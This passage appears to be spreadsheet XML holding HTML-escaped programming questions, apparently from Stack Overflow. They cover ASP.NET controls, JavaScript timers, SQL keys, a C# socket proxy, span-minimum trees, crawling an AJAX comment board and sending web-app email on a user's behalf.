    <t xml:space="preserve">&lt;p&gt;I want to know if others have experienced the situation where people around you are very smart and have few star programmers but as a team you are still struggling to move. I am not talking about people with arrogance/pride or social handicap. &lt;/p&gt;
&lt;p&gt;Does motivation to create shared vision of product play any part?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;I understand the value of Star programmer and teams but what I am really looking for is when even in the presence of such teams, product team is not reflecting that! Have people experienced such situation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get a user GUID from a selected item in a DropDownBox that is databound to a LINQ datasource?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This should be pretty straight forward but I can't seem to get my newbie mind around it. I have a ASP.net page that needs to create a new database entry based on user input from a web form. &lt;/p&gt;
&lt;p&gt;One control in the form is a DropDownBox that is databound to a LinqDataSource whose context is a LinqToSQL data class. The table it is bound to is the default ASP.net aspnet_Users table.&lt;/p&gt;
&lt;p&gt;So I have this drop down list that displays all of the users stored in that table. I have a table called Events that has a foreign key relationship with aspnet_Users (each Event has a aspnet_User) and so I need that aspnet_Users UserId value to create a new Event object. How do I get this value from the selected item in the drop-down box? I'm sure this is much simpler than I'm making it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Awesome Visual Studio Macros</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For a small community discussion, what are some essential Visual Studio macros you use?&lt;/p&gt;
&lt;p&gt;I just started learning about them, and want to hear what some of you can't live without.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sequentially firing multiple random timeouts in JavaScript</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know at first glance (due to the title) this looks like one of the "Did you try searching Google before posting?" questions, but I can't seem to find an answer for the specific issue I'm experiencing.  Sorry if I'm a noob....  still learning :)&lt;/p&gt;
&lt;p&gt;I need to simulate a pause in javascript, but the setTimeout(function_call, timeout) function is not working for me.  Reason being... when that setTimeout function is called, it then makes the function call asynchronously.&lt;/p&gt;
&lt;p&gt;A little background:&lt;br&gt;
I'm trying to simulate text being typed into a div at randomly timed intervals.  I want it to appear as if a person is actually typing a message while the user is viewing the page.  Since the timeout is a random interval and the function call is made asynchronously, the text ends up being printed in a random order.&lt;/p&gt;
&lt;p&gt;Here is a snippet of what I have thus far:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typeString: function(s)
{
    for(var i=0;i&amp;lt;s.length;i++)
    {                      
        var c = s.charAt(i);
        var temp = setTimeout("MessageType.typeChar('" + c + "')", this.genRandomTime());
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;br&gt;&lt;br&gt;
Thanks in advance for your help.&lt;/p&gt;
&lt;p&gt;CJAM&lt;/p&gt;
&lt;p&gt;&lt;br&gt;&lt;br&gt;
UPDATE: By adding the timer delay to a varialbe, it enabled me to offset timeOut for the asynchronous calls.  Thank you all for your quick responses.  Here is the updated code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;typeString: function(s)
{
    var delay = 0;
    for(var i=0;i&amp;lt;s.length;i++)
    {                     
        var c = s.charAt(i);
        setTimeout("GoogleTyper.typeChar('"+c+"')", delay += this.genRandomTime());
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Kdevelop as a Rails IDE</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to use Kdevelep as a Ruby on Rails IDE as I'm using Linux. How do I set up Kdevelop to enable this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Crawling Ajax.request url directly ... permission error</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to crawl a web board, which uses ajax for dynamic update/hide/show of comments without reloading the corresponding post.
I am blocked by this comment area.&lt;/p&gt;
&lt;p&gt;In Ajax.request, url is specified with a path without host name like this :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;new Ajax(**'/bbs/comment_db/load.php'**, {
    update       : $('comment_result'), 
    evalScripts  : true, 
    method       : 'post', 
    data         : 'id=work_gallery&amp;amp;no=i7dg&amp;amp;sno='+npage+'&amp;amp;spl='+splno+'&amp;amp;mno='+cmx+'&amp;amp;ksearch='+$('ksearch').value,
    onComplete   : function() {
        $('cmt_spinner').setStyle('display','none');  
        try { 
            $('cpn'+npage).setStyle('fontWeight','bold'); 
            $('cpf'+npage).setStyle('fontWeight','bold');
        } catch(err) {} 
    }
}).request();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I try to access the url with the full host name then 
I just got the message: "Permission Error" :&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;new Ajax(**'http://host.name.com/bbs/comment_db/load.php'**, {
    update      : $('comment_result'), 
    evalScripts : true, 
    method      : 'post', 
    data        : 'id=work_gallery&amp;amp;no=i7dg&amp;amp;sno='+npage+'&amp;amp;spl='+splno+'&amp;amp;mno='+cmx+'&amp;amp;ksearch='+$('ksearch').value,
    onComplete  : function() {
        $('cmt_spinner').setStyle('display','none');  
        try { 
            $('cpn'+npage).setStyle('fontWeight','bold'); 
            $('cpf'+npage).setStyle('fontWeight','bold');
        } catch(err) {} 
    }
}).request();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;will result in the same error.&lt;/p&gt;
&lt;p&gt;This is the same even when I call the actual php url in the web browser like this:
&lt;a href="http://host.name.com/bbs/comment_db/load.php" rel="nofollow"&gt;http://host.name.com/bbs/comment_db/load.php&lt;/a&gt;?'id=work_gallery&amp;amp;..'&lt;/p&gt;
&lt;p&gt;I guess that the php module is restricted to be called by an url in the same host. &lt;/p&gt;
&lt;p&gt;Any idea for crawling this data ?&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
&lt;p&gt;-- Shin &lt;/p&gt;
</t>
  </si>
  <si>
    <t>retrieve a multi-column PK in MySQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I retrieve a multi-column PK in MySQL?&lt;/p&gt;
&lt;p&gt;For example I have my primary key setup as 
  PRIMARY KEY  (&lt;code&gt;donor_id&lt;/code&gt;,&lt;code&gt;country_id&lt;/code&gt;)&lt;/p&gt;
&lt;p&gt;Now if I want to get the primary key value without concatenating those 2 fields in a select query, how do I do that? I want to use this in a view (or better yet, directly in phpmaker).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a view for inputing integers in Android?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for something like the individual parts of the date picker dialog. A view that allows you to input integers (and only integers) that you can limit (between 1 and 10 for example), where you can use the keyboard or the arrows in the view itself. Does it exists?&lt;/p&gt;
&lt;p&gt;It is for a dialog. A ready-made dialog to request an integer would also help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JUMP and CALL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How is a JUMP and CALL instruction different? How does it relate to the higher level concepts such as a GOTO or a procedure call? (Am I correct in the comparison?)&lt;/p&gt;
&lt;p&gt;This is what I think: &lt;/p&gt;
&lt;p&gt;JUMP or GOTO is a transfer of the control to another location and the control does not automatically return to the point from where it is called. &lt;/p&gt;
&lt;p&gt;On the other hand, a CALL or procedure/function call returns to the point from where it is called. Due to this difference in their nature, languages typically make use of a stack  and a stack frame is pushed to "remember" the location to come back for each procedure called. This behaviour applies to recursive procedures too. In case of tail recursion, there is however no need to "push" a stack frame for &lt;em&gt;each&lt;/em&gt; call.&lt;/p&gt;
&lt;p&gt;Your answers and comments will be much appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to return value from html popup</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a terse, clean way to implement this in asp.net mvc (+/- jquery or js)?&lt;/p&gt;
&lt;p&gt;User clicks an element in webform A; 
Webform B pops up;
User interracts with webform B;
On closing webform B, probably by a submit button, the source element in webform a is updated with a value from webform B&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Find and Remove some text in Excel Worksheet with c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;i wanna find some text for example "Joe" and remove it from where it is in Excel Worksheet with C# ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Union or Use Flow Control Logic to Determine which table to report on</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working with a 3rd pary app where I can't alter the tables. We built custom matching "Monthly" tables with an additional datetime column "AsOfDate" where we dump the data at the end of the month and flag those data with the date of last day of the month.&lt;/p&gt;
&lt;p&gt;I want to be able to create a single Stored Procedure (Application is designed to require a view or stored proc as the source of all reports.) and use a parameter which will either use the current data table (Parameter may be NULL or = Today's Date) or use the month end table and filter by the End of the month date. This way, I have one report where the user can either use current or data from a particular month end period. &lt;/p&gt;
&lt;p&gt;Which would you prefer (And why) Sorry, this is not fully coded&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Solution #1 Union Query&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Create Proc Balance_Report (@AsOfDate)
AS
Select Column1
From
    (Select GetDate() as AsOfDate
       , Column1 
     From Current.Balance
    Union 
    Select AsOfDate
       , Column1 From MonthEnd.Balance
    ) AS All_Balances
Where All_Balances.AsOfDate = @AsOfDate
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Solution #2 Use If Statement to select table&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Create Proc Balance_Report (@AsOfDate)
AS
If @AsOfDate IS NULL or @AsOfDate = GetDate()
   Select GetDate() as AsOfDate
       , Column1 
     From Current.Balance
Else
    Select AsOfDate
       , Column1 From MonthEnd.Balance
    Where AsOfDate = @AsOfDate
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Again, this is not fully coded and is sort of db agnostic (But it is SQL Server 2005).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit: Variation to Solution #2 using separate stored procedures&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Create Proc Balance_Report (@AsOfDate)
AS
If @AsOfDate IS NULL or @AsOfDate = GetDate()
   Exec Current_Balance_Date -- no param necessary
Else
    exec MonthEnd_Balance_Date @AsOfDate
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Update trigger behavior in SQL 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I used an Update statement inside a procedure to update a table which has an update trigger. Does the update statement complete after the trigger completes or what?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Generate combinations ordered by an attribute</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking for a way to generate combinations of objects ordered by a single attribute. I don't think lexicographical order is what I'm looking for... I'll try to give an example. Let's say I have a list of objects A,B,C,D with the attribute values I want to order by being 3,3,2,1. This gives A3, B3, C2, D1 objects. Now I want to generate combinations of 2 objects, but they need to be ordered in a descending way:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;A3 B3&lt;/li&gt;
&lt;li&gt;A3 C2&lt;/li&gt;
&lt;li&gt;B3 C2&lt;/li&gt;
&lt;li&gt;A3 D1&lt;/li&gt;
&lt;li&gt;B3 D1&lt;/li&gt;
&lt;li&gt;C2 D1&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Generating all combinations and sorting them is not acceptable because the real world scenario involves large sets and millions of combinations. (set of 40, order of 8), and I need only combinations above the certain threshold. &lt;/p&gt;
&lt;p&gt;Actually I need count of combinations above a threshold grouped by a sum of a given attribute, but I think it is far more difficult to do - so I'd settle for developing all combinations above a threshold and counting them. If that's possible at all.&lt;/p&gt;
&lt;p&gt;EDIT - My original question wasn't very precise... I don't actually need these combinations ordered, just thought it would help to isolate combinations above a threshold. To be more precise, in the above example, giving a threshold of 5, I'm looking for an information that the given set produces 1 combination with a sum of 6 ( A3 B3 ) and 2 with a sum of 5 ( A3 C2, B3 C2). I don't actually need the combinations themselves.&lt;/p&gt;
&lt;p&gt;I was looking into subset-sum problem, but if I understood correctly given dynamic solution it will only give you information is there a given sum or no, not count of the sums.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery UI datepicker translation</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I translate the datepicker from jQuery UI into an other language (german for exaple)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.Net- should I use the Split-function or the split-method?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Background:&lt;/p&gt;
&lt;p&gt;I needed to split a string of numerous words into an array which separates the words for me for further use later on in my code. However, I needed to get rid of any numbers which might be present in the string so I declared a string contaning characters which I wanted to use as separators/delimiters as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;dim Separators As String = " 1234567890"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;so my code became more or less as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;''//USING SPLIT-FUNCTION
dim MyTestString as String = "This is 9 a 567 test" 
dim Separators As String = " 1234567890"
dim ResultWithNoNumbers() as String
ResultWithNoNumbers = Split(MyTestString,Separators.ToCharArray)
Messagebox.Show(ResultWithNoNumbers.Length.ToString)
''//Result is 1 and no split was performed
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This did not work since the Split-functions did not consider my Separators as individual characters&lt;/p&gt;
&lt;p&gt;however this worked..&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;''//USING SPLIT-METHOD
dim MyTestString as String = "This is 9 a 567 test" 
dim Separators As String = " 1234567890"
dim ResultWithNoNumbers() as String
ResultWithNoNumbers = MyTestString.Split(Separators.ToCharArray,
                                    _StringSplitOptions.RemoveEmptyEntries)
Messagebox.Show(ResultWithNoNumbers.Length.ToString)
''//Result is 4 and split was performed
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So far, so good - since one has more options with the Split-method compared to the Split-function, I managed to resolve my problem.&lt;/p&gt;
&lt;p&gt;Now to my question, let's say I only needed the standard space-character (" ") as a delimiter (and no need to get rid of numbers like in above example), then both ways would work. So which one would you use? Apart from various options available, are there any advantages using a particular one? Perhaps one is faster, less memory-hungry?&lt;/p&gt;
&lt;p&gt;EDIT: I'm developing for Windows Mobile and that's why speed- and memory-issues get important.&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sockets in C#: How to get the response stream?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to replace this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void ProcessRequest(object listenerContext)
{
    var context = (HttpListenerContext)listenerContext;
    Uri URL = new Uri(context.Request.RawUrl);
    HttpWebRequest.DefaultWebProxy = null;
    HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(URL);
    httpWebRequest.Method = context.Request.HttpMethod;
    httpWebRequest.Headers.Clear();
    if (context.Request.UserAgent != null) httpWebRequest.UserAgent = context.Request.UserAgent;
    foreach (string headerKey in context.Request.Headers.AllKeys)
    {
        try { httpWebRequest.Headers.Set(headerKey, context.Request.Headers[headerKey]); }
            catch (Exception) { }
    }
    using (HttpWebResponse httpWebResponse = (HttpWebResponse)httpWebRequest.GetResponse())
    {
        Stream responseStream = httpWebResponse.GetResponseStream();
        if (httpWebResponse.ContentEncoding.ToLower().Contains("gzip"))
            responseStream = new GZipStream(responseStream, CompressionMode.Decompress);
        else if (httpWebResponse.ContentEncoding.ToLower().Contains("deflate"))
                responseStream = new DeflateStream(responseStream, CompressionMode.Decompress);
        MemoryStream memStream = new MemoryStream();
        byte[] respBuffer = new byte[4096];
        try
        {
            int bytesRead = responseStream.Read(respBuffer, 0, respBuffer.Length);
            while (bytesRead &amp;gt; 0)
            {
                memStream.Write(respBuffer, 0, bytesRead);
                bytesRead = responseStream.Read(respBuffer, 0, respBuffer.Length);
            }
        }
        finally
        {
            responseStream.Close();
        }
        byte[] msg = memStream.ToArray();
        context.Response.ContentLength64 = msg.Length;
        using (Stream strOut = context.Response.OutputStream)
        {
            strOut.Write(msg, 0, msg.Length);
        }
    }
    catch (Exception ex)
    {
        // Some error handling
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;with sockets. This is what I have so far:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void ProcessRequest(object listenerContext)
{
    HttpListenerContext context = (HttpListenerContext)listenerContext;
    Uri URL = new Uri(context.Request.RawUrl);
    string getString = string.Format("GET {0} HTTP/1.1\r\nHost: {1}\r\nAccept-Encoding: gzip\r\n\r\n",
                context.Request.Url.PathAndQuery,
                context.Request.UserHostName);
    Socket socket = null;
    string[] hostAndPort;
    if (context.Request.UserHostName.Contains(":"))
    {
        hostAndPort = context.Request.UserHostName.Split(':');
    }
    else
    {
        hostAndPort = new string[] { context.Request.UserHostName, "80" };
    }
    IPHostEntry ipAddress = Dns.GetHostEntry(hostAndPort[0]);
    IPEndPoint ip = new IPEndPoint(IPAddress.Parse(ipAddress.AddressList[0].ToString()), int.Parse(hostAndPort[1]));
    socket = new Socket(ip.AddressFamily, SocketType.Stream, ProtocolType.Tcp);
    socket.Connect(ip);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;BEGIN NEW CODE&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Encoding ASCII = Encoding.ASCII;
Byte[] byteGetString = ASCII.GetBytes(getString);
Byte[] receiveByte = new Byte[256];
string response = string.Empty;
socket.Send(byteGetString, byteGetString.Length, 0);
Int32 bytes = socket.Receive(receiveByte, receiveByte.Length, 0);
response += ASCII.GetString(receiveByte, 0, bytes);
while (bytes &amp;gt; 0)
{
bytes = socket.Receive(receiveByte, receiveByte.Length, 0);
strPage = strPage + ASCII.GetString(receiveByte, 0, bytes);
}
socket.Close();
string separator = "\r\n\r\n";
string header = strPage.Substring(0,strPage.IndexOf(separator));
string content = strPage.Remove(0, strPage.IndexOf(separator) + 4);
byte[] byteResponse = ASCII.GetBytes(content);
context.Response.ContentLength64 = byteResponse .Length;
context.Response.OutputStream.Write(byteResponse , 0, byteResponse .Length);
context.Response.OutputStream.Close();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;END NEW CODE&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;After connecting to the socket I don't know how to get the Stream response to decompress, and send back to &lt;strong&gt;context.Response.OutputStream&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Any help will be appreciated.
Thanks.
Cheers.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT 2:&lt;/strong&gt;
With this edit now seems to be working fine (same as HttpWebRequest at least). Do you find any error here?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT 3:&lt;/strong&gt;
False alarm... Still can't get this working&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT 4:&lt;/strong&gt;
I needed to add the following lines to Scott's code ... because not always the first to bytes of reponseStream are the gzip magic number.
The sequence seems to be: 0x0a (10), 0x1f (31), 0x8b (139). The last two are the gzip magic number. The first number was always before in my tests.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (contentEncoding.Equals("gzip"))
{
    int magicNumber = 0;
    while (magicNumber != 10)
        magicNumber = responseStream.ReadByte();
    responseStream = new GZipStream(responseStream, CompressionMode.Decompress);
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>ASP.NET: Your most used httpmodules</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Interested in description of your most used ASP.NET httpmodules that solved a specific problem for your webapp.&lt;br/&gt;
Best practices and in-the-field usages are welcome.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a Delphi library which reads and writes .properties files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I thought about creating my own, but there are many details to consider to make it 100% compatible with Java .properties files, so I'm asking first.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you find the paths of linked images in Adobe Illustrator 9?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an Illustrator file with linked images. I'd actually like to instead embed the images. I first have to know which files they are. How do I find out? I'm using Illustrator 9.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Easy way to pdf a web report</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are trying to create a web reporting system, with the standard flash chart's, one of the major requirements is that this report must be emailed to customers on a regular schedule as a PDF file.&lt;/p&gt;
&lt;p&gt;Does anyone know of either&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;An easy tool to point at the webpage and pdf it, including flash charts&lt;/li&gt;
&lt;li&gt;Another way of doing this?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We have tried sql server reporting in the past and found it to be a little slow and generally the charting is a little unpretty.&lt;/p&gt;
&lt;p&gt;Any help is appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using ironscheme in visual studio 2008</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Though it says on the IronScheme codeplex site that a plugin is included for visual studio, I have no idea how to get ironscheme working with VS...&lt;/p&gt;
&lt;p&gt;Is it possible? If so , how?&lt;/p&gt;
&lt;p&gt;Thanks &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Timer code for online quiz on mobiles</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are doing project on online quiz tool for mobile devices using J2ME. We got the code for midlet interface, webserver and connections. But we need to implement timer in it. So anyone can give suggestions for that code and where can be it beneficial to implement it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Practice for PK in SQL Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been wondering what the best practices or ramifications are in setting up the PK in a M2M table in SQL Server. For instance:&lt;/p&gt;
&lt;p&gt;I have 2 tables&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Users&lt;/li&gt;
&lt;li&gt;Roles&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;I am making a new table&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;UserRole&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Which has 2 fields
 RoleId &amp;amp; UserID&lt;/p&gt;
&lt;p&gt;now should I &lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;create a UserRoleID as the PK and make UserID and RoleID the FKs&lt;/li&gt;
&lt;li&gt;make the PK UserID AND RoleID and set them as FKs&lt;/li&gt;
&lt;li&gt;something else&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I would like to know the performance issues with each of the options and what the recommended best practices are.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>what is the best way to mark any text?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need users to mark some section of text with custom tags, I can't use the xml based tags as the whole text will be embedded in XML documents and all the &amp;lt; will be converted to html escape code &amp;lt;. I want users to marks some section of text with tags like skip, bookmark, these tags can have attributes also like bookmark name="first".
Which is the best way of allowing users to mark text using the BB forum way like [b]abcd[/b]
or using {{bookmark name="first"}}.
Or is there any better scheme or technique available.&lt;/p&gt;
&lt;p&gt;I don't want to change the structure of the text as down by the markdown or textile, I just want to tag some section of text, like the phpBB tags. The question is there any other style than phpBB? Like in some software I see {{bookmark name = "abcd"}} style.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Asp.net E-commerce performance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am developing e-commerce project on Asp.Net 3.5 with C#. I am using 3 tiers (Data + Business + UI) structure to reach the data from database (Msql 2005).&lt;/p&gt;
&lt;p&gt;There are stored procedures and everything going on from them.(CRUD methods)&lt;/p&gt;
&lt;p&gt;There is a performance issue here, project is running so slowly. I couldn't find any problem in transaction model.&lt;/p&gt;
&lt;p&gt;Also the project is running on shared hosting at overseas country.Database server and web server are running on different machines.Database server has nearly 1000 databases.&lt;/p&gt;
&lt;p&gt;How can I test and learn where is the problem ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>The right language for OpenGL UI prototyping. Ditching Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So, I got this idea that I'd try to prototype an experimental user interface using OpenGL and some physics. I know little about either of the topics, but am pretty experienced with programming languages such as C++, Java and C#. After some initial research, I decided on using Python (with Eclipse/PyDev) and Qt, both new to me, and now have four different topics to learn more or less simultaneously.&lt;/p&gt;
&lt;p&gt;I've gotten quite far with both OpenGL and Python, but while Python and its ecosystem initially seemed perfect for the task, I've now discovered some serious drawbacks. Bad API documentation and lacking code completion (due to dynamic typing), having to import every module I use in every other module gets tedious when having one class per module, having to select the correct module to run the program, and having to wait 30 seconds for the program to start and obscure the IDE before being notified of many obvious typos and other mistakes. It gets really annoying really fast. Quite frankly, i don't get what all the fuzz is about. Lambda functions, list comprehensions etc. are nice and all, but there's certainly more important things.&lt;/p&gt;
&lt;p&gt;So, unless anyone can resolve at least some of these annoyances, Python is out. C++ is out as well, for obvious reasons, and C# is out, mainly for lack of portability. This leaves Java and JOGL as an attractive option, but I'm also curious about Ruby and Groovy. I'd like your opinion on these and others though, to keep my from making the same mistake again.&lt;/p&gt;
&lt;p&gt;The requirements are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Keeping the hell out of my way.&lt;/li&gt;
&lt;li&gt;Good code completion. Complete method signatures, including data types and parameter names.&lt;/li&gt;
&lt;li&gt;Good OpenGL support.&lt;/li&gt;
&lt;li&gt;Qt support is preferable.&lt;/li&gt;
&lt;li&gt;Object Oriented&lt;/li&gt;
&lt;li&gt;Suitable for RAD, prototyping&lt;/li&gt;
&lt;li&gt;Cross-platform&lt;/li&gt;
&lt;li&gt;Preferably Open-Source, but at least free.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Fast min on span</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a list of arrays and lots of setup time I need to quickly find the smallest value in some sub-span of each array. In concept:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class SpanThing
{
     int Data;
     SpanThing(int[][] data) /// must be rectangulare
     {
         Data = data;
         //// process, can take a while
     }
     int[] MinsBruteForce(int from, int to)
     {
         int[] result = new int[data.length];
         foreach(int index, int[] dat; Data)
         {
             result[i] = int.max;
             foreach(int v; dat[from .. to]);
                result[i] = min(result[i], v);
         }
         return result;
     }
     int[] MinsSmart(int from, int to)
     {
          // same as MinsBruteForce but faster
     }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;My current thinking on how to do this would be to build a binary tree over the data where each node contains the min in the related span. That way finding the min in the span for one row would consist of finding the min of only the tree nodes that compose it. This set would be the same for each row so could be computed once.&lt;/p&gt;
&lt;p&gt;Does any one see any issues with this idea or known of better ways?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;To clarify, the tree I'm talking about would be set up sutch that the root node would contain the min value for the entire row and for each node, it's left child would have the min value for the left half of the parent's span and the same for the right.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; 0   5   6  2   7   9   4   1   7   2   8   4   2
 ------------------------------------------------
   | 5 | 6|   | 7 | 9 |   | 1 | 7 | 2 | 8 | 4 | 2  
 0 |   5  | 2 |   7   | 4 |   1   |   2   |   2  
   0      |   2       |   1       |       2
          0           |           1
                      0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This tree can be mapped to an array and defined in such a way that the segment bounds can be computed resulting in fast look-up. &lt;/p&gt;
&lt;p&gt;The case I'm optimizing for is where I have a fixed input set and lots of up front time but then need to do many fast tests on a veriety of spans.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Showing data and counting from multiple databases in MySQL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two tables, that is joined in some way. I've spent the last hour googling around, not finding any concrete answers that worked in my case.&lt;/p&gt;
&lt;p&gt;The case is, table 1 is called Clients, and table 2 is called Projects. I need to list all the client names, followed by number of projects related to that project and the project title.&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;p&gt;Client 1 (2 projects)&lt;br /&gt;
- Project 1 title&lt;br /&gt;
- Project 2 title&lt;br /&gt;&lt;/p&gt;
&lt;p&gt;Client 2 (0 projects)&lt;/p&gt;
&lt;p&gt;Client 3 (1 project)&lt;br /&gt;
- Project 1 title&lt;/p&gt;
&lt;p&gt;How is this doable, in the simplest and easiest way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# ComboBox in DropDownList style, how do I set the text?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to use a ComboBox with the DropDownList style (the one that makes it look like a button so you can't enter a value) to insert a value into a text box. I want the combobox to have a text label called 'Wildcards' and as I select a wildcard from the list the selected value is inserted in to a text box and the combobox text remains 'Wildcard'. My first problem is I can't seem to set a text value when the combobox is in DropDownList style. Using the properties pallet doesn't work the text value is simply cleared when you click off, adding comboBox.Text = "Wildcards"; to form_load doesn't work either. Can anyone help?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to send email from my web app so it looks like it came from my users account</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a web application. A user will create an email message that will be sent to another person.&lt;/p&gt;
&lt;p&gt;I would like the e-mail that gets sent to appear from the user's name and e-mail address of the user on my system. And if they reply to the e-mail then it should go directly to the sender's email address.&lt;/p&gt;
&lt;p&gt;However I am worried about the email message looking like spam to email filters along the way.&lt;/p&gt;
&lt;p&gt;Is there a proper way to do this?&lt;/p&gt;
&lt;p&gt;I noticed on a "contact" page on a WordPress blog that something very similar is done. The e-mail headers look like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;To: email@domain.com
Subject: [Test Blog] =?UTF-8?B?aGVsbA==?=
MIME-Version: 1.0
